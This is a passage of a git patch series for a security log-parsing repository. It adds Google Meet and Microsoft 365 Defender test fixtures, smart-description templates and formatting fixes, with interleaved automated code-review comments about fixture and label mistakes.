:\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Pari
s\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",
\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file 
diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json
new file mode 100644
index 000000000..de33d47c4
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\"
:\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value
\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json 
@@ -41,13 +41,20 @@ "transport": "udp" }, "related": { + "ip": [ + "5555:333:333:5555:5555:5555:5555:5555" + ], "user": [ "jone.doe" ] }, + "source": { + "address": "5555:333:333:5555:5555:5555:5555:5555", + "ip": "5555:333:333:5555:5555:5555:5555:5555" + }, "user": { "domain": "test.com", - "email": "jone.doe@test.com", + "email": "joe.done@test.com", "id": "1098488062555", "name": "jone.doe" } From 74e459dd00f628dc287820ee60efef6fb61789ab Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:39:44 +0100 Subject: [PATCH 66/84] Prettier on another parser to pass tests --- GateWatcher/aioniq/ingest/parser.yml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 3cc13d747..20c57feb0 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
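Review bot: The expected `user.email` on the new side is `joe.done@test.com` while `user.name` and `related.user` in the same fixture still read `jone.doe`, so the identity fields of this expectation no longer agree with each other; this reads like a transposition typo rather than a deliberate change. If the parser derives `user.name` from the local part of the email the expectation will fail outright, and if it reads a separate input field the fixture now pins a mismatch that will mislead anyone using it as a reference. Suggest `"email": "jone.doe@test.com"`, or change `user.name`/`related.user` to whatever the input (outside this hunk) actually carries. The hunk header `+41,20` admits only eight added lines, so the `+` marker shown before `"jone.doe"` looks like a rendering artifact rather than a real addition.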
@@ -206,12 +206,12 @@ stages:
 tls:
 actions:
 - set:
- tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
- tls.server.not_before: "{{json_load.message.tls.notbefore}}"
- tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
- tls.server.subject: "{{json_load.message.tls.subject}}"
- gatewatcher.tls: "{{json_load.message.tls}}"
- gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
- gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
- tls.version: "{{json_load.message.tls.version}}"
- tls.server.not_after: "{{json_load.message.tls.notafter}}"
+ tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+ tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+ tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+ tls.server.subject: "{{json_load.message.tls.subject}}"
+ gatewatcher.tls: "{{json_load.message.tls}}"
+ gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+ gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
+ tls.version: "{{json_load.message.tls.version}}"
+ tls.server.not_after: "{{json_load.message.tls.notafter}}"
From ba631f3d23a2724a148dea4093f6010b3d176331 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Fri, 22 Nov 2024 10:41:05 +0100
Subject: [PATCH 67/84] fix on linting
---
 GateWatcher/aioniq/_meta/fields.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 07bae26e7..8bc01d294 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -389,16 +389,16 @@ gatewatcher.tls: name: gatewatcher.tls type: text -gatewatcher.tls_sni: - description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls_sni - type: text - gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata name: gatewatcher.tls_fingerprint type: text +gatewatcher.tls_sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls_sni + type: text + gatewatcher.ttp: description: This field is used for retrohunt alerts name: gatewatcher.ttp From 97df6b20679a01fb368a3a46dc440ef564086d46 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:07:17 +0100 Subject: [PATCH 68/84] Microsoft 365 defender : fix on smart descriptions --- .../_meta/smart-descriptions.json | 61 ++++++++++++ .../tests/test_cloud_app4.json | 63 ++++++++++++ .../tests/test_device_logon_failed.json | 98 +++++++++++++++++++ .../tests/test_email_delivered.json | 76 ++++++++++++++ .../tests/test_email_delivered2.json | 76 ++++++++++++++ 5 files changed, 374 insertions(+) create mode 100644 Microsoft/microsoft-365-defender/tests/test_cloud_app4.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_email_delivered2.json diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 21e3caf3c..6232e66f8 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json 
@@ -1,4 +1,14 @@
 [
+ {
+ "value": "A new {action.type} cloud app event have been received",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "cloud_app_events"
+ },
+ { "field": "action.type" }
+ ]
+ },
 {
 "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}",
 "conditions": [
@@ -132,6 +142,35 @@
 }
 ]
 },
+ {
+ "value": "{user.domain}\\{user.name} failed to log on {host.name}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "device_logon_events"
+ },
+ {
+ "field": "host.name"
+ },
+ {
+ "field": "user.name"
+ },
+ {
+ "field": "user.domain"
+ },
+ {
+ "field": "action.type",
+ "value": "LogonFailed"
+ }
+ ],
+ "relationships": [
+ {
+ "source": "user.name",
+ "target": "host.name",
+ "type": "logged on"
+ }
+ ]
+ },
 {
 "value": "{user.domain}\\{user.name} logged on {host.name}",
 "conditions": [
@@ -402,6 +441,28 @@
 { "field": "email.to.address" }
 ]
 },
+ {
+ "value": "{event.action} email from {email.from.address} to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" },
+ { "field": "email.to.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email from {email.from.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.from.address" }
+ ]
+ },
+ {
+ "value": "{event.action} email to {email.to.address}",
+ "conditions": [
+ { "field": "event.dataset", "value": "email_events" },
+ { "field": "email.to.address" }
+ ]
+ },
 {
 "value": "{action.type} on {url.original}",
 "conditions": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
new file mode 100644
index 000000000..86f044fe7
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json
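Review bot: The new `LogonFailed` smart-description in the second hunk declares a relationship of `"type": "logged on"` between `user.name` and `host.name`, which asserts a successful session for an event whose action is a failed logon and will draw a misleading user→host edge in any entity graph built from these descriptions; change it to `"type": "failed to log on"` or drop the relationship for failures. Placing this entry ahead of the existing `logged on` description only works if entries are evaluated in order and the first match wins — please confirm that, since the older entry does not condition on `action.type` and would otherwise still fire for failures. In the first hunk the description string should read `A new {action.type} cloud app event has been received` (`has`, not `have`).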
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":
[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John 
DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": 
"{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + 